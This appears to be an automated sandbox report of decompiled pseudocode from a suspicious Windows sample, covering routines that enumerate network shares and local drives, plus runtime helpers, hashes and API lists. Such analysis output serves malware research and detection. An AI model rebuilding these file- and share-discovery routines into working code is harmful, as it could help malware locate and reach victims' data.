				_t164 = __edx;
				_v160 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
					_t122 = GlobalAlloc(0x40, _v164);
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x72
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t161 = _t110 + 2;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16
									E00410BD0(_t71, _t164);
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c1a
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cab90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives();
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1);
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
					_t72 = _t40;
					SetErrorMode(_t39);
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76, 0);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v56);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

0x00410a53
0x00410a56
0x00410a58
0x00410a63
0x00410a64
0x00410a6b
0x00410a6f
0x00410a70
0x00410a71
0x00410a75
0x00410a7b
0x00410a7f
0x00410a81
0x00410a8a
0x00000000
0x00000000
0x00410a90
0x00410a9b
0x00410aa3
0x00410aab
0x00410ab0
0x00410ab5
0x00410ac6
0x00410ac9
0x00410acb
0x00410ad5
0x00410adb
0x00410ae2
0x00410af1
0x00410af3
0x00410af9
0x00410b00
0x00410b02
0x00410b0a
0x00410b15
0x00410b1b
0x00410b24
0x00410b30
0x00410b33
0x00410b38
0x00410b3e
0x00410b42
0x00410b49
0x00410b51
0x00410b54
0x00410b61
0x00410b66
0x00410b6e
0x00410b73
0x00410b7d
0x00410b83
0x00410b88
0x00410b88
0x00410b7d
0x00410b24
0x00410b8b
0x00410b98
0x00410b9e
0x00410ba3
0x00410ba3
0x00410ba6
0x00410baa
0x00410baa
0x00410bab
0x00410bba
0x00410bc5

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

0x0043b706
0x0043b714
0x0043b717
0x0043b719
0x0043b728
0x0043b75b
0x0043b75b
0x0043b75e
0x00000000
0x00000000
0x0043b72b
0x0043b72d
0x0043b72f
0x0043b72f
0x0043b72f
0x0043b73c
0x0043b742
0x0043b744
0x0043b746
0x0043b7a6
0x0043b7a6
0x0043b748
0x0043b748
0x0043b74e
0x0043b790
0x0043b7a4
0x00000000
0x0043b750
0x0043b757
0x0043b759
0x0043b778
0x0043b78c
0x0043b772
0x0043b772
0x0043b772
0x00000000
0x00000000
0x00000000
0x0043b759
0x0043b74e
0x00000000
0x0043b774
0x0043b761
0x0043b76c
0x00000000
0x0043b71b
0x0043b71e
0x0043b724
0x0043b724
0x0043b775
0x0043b777
0x0043b708
0x0043b712
0x0043b712

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
